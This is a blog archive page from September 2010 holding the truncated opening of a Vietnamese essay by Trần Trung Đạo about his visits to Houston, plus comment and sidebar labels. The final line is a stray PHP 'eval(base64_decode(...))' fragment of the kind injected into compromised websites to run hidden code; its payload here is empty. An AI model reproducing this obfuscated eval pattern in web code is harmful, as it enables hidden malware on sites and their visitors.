Archive for September 30th, 2010

Trần Trung Đạo: Tình Người Như Mùa Xuân

Trần Trung Đạo: Tình Người Như Mùa Xuân

Tôi đến Houston nhiều lần. Giới thiệu sách. Đọc thơ. Tâm tình với các bạn trẻ. Và lần sau cùng, năm năm trước, cũng để giới thiệu sách và đọc thơ. Thời gian như bóng mây ngoài khung cửa phi cơ mỗi lúc một xa nhưng Houston vẫn là thà

09.30.2010 | Ký-Truyện-Tùy Bút |

5 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>